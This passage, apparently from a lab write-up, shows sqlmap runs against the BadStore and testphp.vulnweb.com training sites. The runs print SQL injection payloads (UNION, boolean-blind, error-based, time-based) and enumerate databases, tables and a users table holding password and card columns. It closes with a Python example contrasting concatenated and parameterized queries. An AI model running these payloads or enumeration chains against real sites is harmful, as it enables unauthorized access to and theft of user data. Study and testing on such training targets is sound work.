    Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,118,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,58))# AND 'bYfh'='bYfh&action=search&x=0&y=0
---
[10:12:35] [INFO] the back-end DBMS is MySQL
web application technology: Apache 1.3.28
back-end DBMS: MySQL 4
[10:12:35] [INFO] fetching current database
current database: 'badstoredb'
[10:12:36] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164'

[*] shutting down at: 10:12:36

The name of the DB is badstoredb.
C) Tables

C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --tables -D badstoredb

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 10:20:13

[10:20:13] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file
[10:20:13] [INFO] resuming injection data from session file
[10:20:13] [INFO] resuming back-end DBMS 'mysql 4' from session file
[10:20:13] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: searchquery
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,118,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,58))# AND 'bYfh'='bYfh&action=search&x=0&y=0
---
[10:20:14] [INFO] the back-end DBMS is MySQL
web application technology: Apache 1.3.28
back-end DBMS: MySQL 4
[10:20:14] [ERROR] information_schema not available, back-end DBMS is MySQL < 5.0
do you want to use common table existance check? [Y/n/q] y
[10:20:21] [INFO] checking table existence using items from 'C:\sqlmap-0.9\sqlmap\txt\common-tables.txt'
[10:20:21] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)]
[10:20:28] [WARNING] running in a single-thread mode. This could take a while.
[10:27:14] [INFO] retrieved: itemdb
Database: badstoredb
[1 table]
+--------+
| itemdb |
+--------+

[10:27:14] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164'

[*] shutting down at: 10:27:14

The name of the table is itemdb. Because there is no information_schema to query, sqlmap fell back to testing, one request per candidate, whether each name in its common-tables.txt (plus words scraped from the page) exists; in single-thread mode that took almost seven minutes, and it can only discover table names that appear in the list.
D) Columns

C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --columns -T itemdb -D badstoredb

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 10:29:00

[10:29:00] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file
[10:29:00] [INFO] resuming injection data from session file
[10:29:00] [INFO] resuming back-end DBMS 'mysql 4' from session file
[10:29:00] [INFO] resuming brute forced table name 'itemdb' from session file
[10:29:00] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: searchquery
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,118,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,58))# AND 'bYfh'='bYfh&action=search&x=0&y=0
---
[10:29:00] [INFO] the back-end DBMS is MySQL
web application technology: Apache 1.3.28
back-end DBMS: MySQL 4
[10:29:00] [ERROR] information_schema not available, back-end DBMS is MySQL < 5.0
do you want to use common columns existance check? [Y/n/q] y
[10:29:03] [INFO] checking column existence using items from 'C:\sqlmap-0.9\sqlmap\txt\common-columns.txt'
please enter number of threads? [Enter for 1 (current)]
[10:29:05] [WARNING] running in a single-thread mode. This could take a while.
[10:29:36] [INFO] retrieved: price
[10:29:55] [INFO] retrieved: qty
Database: badstoredb
Table: itemdb
[2 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| price  | numeric |
| qty    | numeric |
+--------+---------+

[10:34:18] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164'

[*] shutting down at: 10:34:18

Only two column names were recovered, again by word-list guessing. The UNION test in step A showed that the search query returns 4 columns, so itemdb has at least two further columns whose names are not in common-columns.txt.
E) Remaining databases

As we have seen, there is no table called users or anything of the sort; only the products table is present, so this way we cannot obtain users or passwords. Let us therefore check the other databases:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --dbs

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 10:36:17

[10:36:17] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file
[10:36:17] [INFO] resuming injection data from session file
[10:36:17] [INFO] resuming back-end DBMS 'mysql 4' from session file
[10:36:17] [INFO] resuming brute forced table name 'itemdb' from session file
[10:36:17] [INFO] resuming brute forced column name 'price' for table 'itemdb' from session file
[10:36:17] [INFO] resuming brute forced column name 'qty' for table 'itemdb' from session file
[10:36:17] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: searchquery
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,118,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,58))# AND 'bYfh'='bYfh&action=search&x=0&y=0
---

[10:36:18] [INFO] the back-end DBMS is MySQL
web application technology: Apache 1.3.28
back-end DBMS: MySQL 4
[10:36:18] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database
[10:36:18] [INFO] fetching database names
[10:36:18] [INFO] fetching number of databases
[10:36:18] [ERROR] unable to retrieve the number of databases
[10:36:18] [INFO] falling back to current database
[10:36:18] [INFO] fetching current database
[10:36:18] [INFO] read from file 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session': badstoredb
available databases [1]:
[*] badstoredb

[10:36:18] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164'

[*] shutting down at: 10:36:18
4. Acunetix

We go to the site and, after browsing around it for a while, in the categories section we see that the URL shows ?cat=1, which is a hint worth checking:

http://testphp.vulnweb.com/listproducts.php?cat=1

We go to sqlmap and try:
A) DB server and version

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 10:52:48

[10:52:49] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session' as session file
[10:52:49] [INFO] testing connection to the target url
[10:52:49] [INFO] testing if the url is stable, wait a few seconds
[10:52:50] [INFO] url is stable
[10:52:50] [INFO] testing if GET parameter 'cat' is dynamic
[10:52:50] [INFO] confirming that GET parameter 'cat' is dynamic
[10:52:51] [INFO] GET parameter 'cat' is dynamic
[10:52:51] [INFO] heuristic test shows that GET parameter 'cat' might be injectable (possible DBMS: MySQL)
[10:52:51] [INFO] testing sql injection on GET parameter 'cat'
[10:52:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:52:52] [INFO] GET parameter 'cat' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[10:52:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:52:52] [INFO] GET parameter 'cat' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[10:52:52] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:52:52] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:53:52] [INFO] GET parameter 'cat' is 'MySQL > 5.0.11 AND time-based blind' injectable
[10:53:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:53:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'cat' is vulnerable. Do you want to keep testing the others? [y/N] n
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 4423=4423

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,107,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[10:54:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[10:54:07] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com'

[*] shutting down at: 10:54:07
The cat parameter is vulnerable.
B) Database name

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --current-db

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 11:52:15

[11:52:15] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session' as session file
[11:52:15] [INFO] resuming injection data from session file
[11:52:15] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:52:15] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 4423=4423

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,107,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[11:52:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[11:52:16] [INFO] fetching current database
[11:52:18] [INFO] retrieved: acuart
current database: 'acuart'
[11:52:18] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com'

[*] shutting down at: 11:52:18
C) Tables

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --tables -D acuart

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 11:54:12

[11:54:12] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session' as session file
[11:54:12] [INFO] resuming injection data from session file
[11:54:12] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:54:12] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 4423=4423

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,107,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[11:54:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[11:54:14] [INFO] fetching tables for database 'acuart'
[11:54:14] [INFO] the SQL query used returns 7 entries
[11:54:15] [INFO] retrieved: acuart
[11:54:15] [INFO] retrieved: artists
[11:54:15] [INFO] retrieved: acuart
[11:54:15] [INFO] retrieved: carts
[11:54:16] [INFO] retrieved: acuart
[11:54:16] [INFO] retrieved: categ
[11:54:16] [INFO] retrieved: acuart
[11:54:16] [INFO] retrieved: featured
[11:54:17] [INFO] retrieved: acuart
[11:54:17] [INFO] retrieved: guestbook
[11:54:17] [INFO] retrieved: acuart
[11:54:17] [INFO] retrieved: pictures
[11:54:18] [INFO] retrieved: acuart
[11:54:18] [INFO] retrieved: users
Database: acuart
[7 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| users     |
+-----------+
D) Columns

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --columns -T users -D acuart

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 11:56:55

[11:56:55] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session' as session file
[11:56:55] [INFO] resuming injection data from session file
[11:56:55] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:56:55] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 4423=4423

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,107,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[11:56:56] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[11:56:56] [INFO] fetching columns for table 'users' on database 'acuart'
[11:56:56] [INFO] the SQL query used returns 8 entries
[11:56:56] [INFO] retrieved: uname
[11:56:56] [INFO] retrieved: varchar(100)
[11:56:57] [INFO] retrieved: pass
[11:56:57] [INFO] retrieved: varchar(100)
[11:56:57] [INFO] retrieved: cc
[11:56:58] [INFO] retrieved: varchar(100)
[11:56:58] [INFO] retrieved: address
[11:56:58] [INFO] retrieved: mediumtext
[11:56:58] [INFO] retrieved: email
[11:56:58] [INFO] retrieved: varchar(100)
[11:56:58] [INFO] retrieved: name
[11:56:59] [INFO] retrieved: varchar(100)
[11:56:59] [INFO] retrieved: phone
[11:56:59] [INFO] retrieved: varchar(100)
[11:56:59] [INFO] retrieved: cart
[11:56:59] [INFO] retrieved: varchar(100)
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+
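All three techniques sqlmap confirmed against listproducts.php?cat=1, and the whole enumeration chain that follows (current database, tables, columns), rest on one defect: the cat parameter is spliced into the SQL text, so an appended AND condition is executed as part of the query. The script below is an added example written for this report, not the vulnweb application's PHP code. It uses Python's sqlite3 module on a small in-memory product table, constructed here with made-up table and column names, to contrast a handler that concatenates the parameter with one that binds it, adds the integer check a category id should get anyway, and wraps the boolean-blind true/false comparison from the session above as a regression oracle a developer can keep in the test suite.

```python
"""Why cat=1 AND 4423=4423 works, and how binding the parameter stops it (added example)."""
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the shop's product table (names are made up)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER PRIMARY KEY, cat INTEGER, name TEXT);
        INSERT INTO products VALUES (1, 1, 'Paintings'), (2, 1, 'Sketches'), (3, 2, 'Photos');
    """)
    return conn


def list_products_vulnerable(conn, cat):
    """Mirrors a listproducts.php?cat=... handler that splices the parameter into the SQL text.
    Everything after the number is parsed as SQL, which is what the probes above rely on."""
    sql = "SELECT name FROM products WHERE cat=" + cat + " ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def list_products_parameterized(conn, cat):
    """Same query with a bound parameter: the value is compared as data, never parsed as SQL.
    '1 AND 4423=4423' cannot be converted to a number, so it simply matches no row."""
    rows = conn.execute("SELECT name FROM products WHERE cat=? ORDER BY id", (cat,))
    return [row[0] for row in rows]


def list_products_validated(conn, cat):
    """Binding plus input validation: a category id must be an integer, so reject anything
    else before touching the database (int() raises ValueError for '1 AND 4423=4423')."""
    return list_products_parameterized(conn, int(cat))


def is_blind_injectable(conn, handler):
    """Regression oracle for the boolean-blind technique shown above: a handler is injectable
    when a true and a false appended condition yield different result sets for the same
    base value.  A handler that rejects the input outright is reported as not injectable."""
    try:
        true_probe = handler(conn, "1 AND 4423=4423")
        false_probe = handler(conn, "1 AND 4423=4424")
    except ValueError:
        return False
    return true_probe != false_probe


if __name__ == "__main__":
    db = make_db()
    for label, handler in [("vulnerable", list_products_vulnerable),
                           ("parameterized", list_products_parameterized),
                           ("validated", list_products_validated)]:
        print(f"{label:14} cat=1 -> {handler(db, '1')}   blind-injectable: {is_blind_injectable(db, handler)}")
```

The parameterized handler still answers the injected value, but with an empty page for both the true and the false probe, so the difference sqlmap measures is gone; the validated handler goes one step further and fails fast on anything that is not a number, which is also the point at which a real application should log the rejected input. Error-based and time-based injection need the same fix: once the parameter is bound, the CONCAT/FLOOR(RAND()) and SLEEP() expressions in the session above are never parsed by MySQL either.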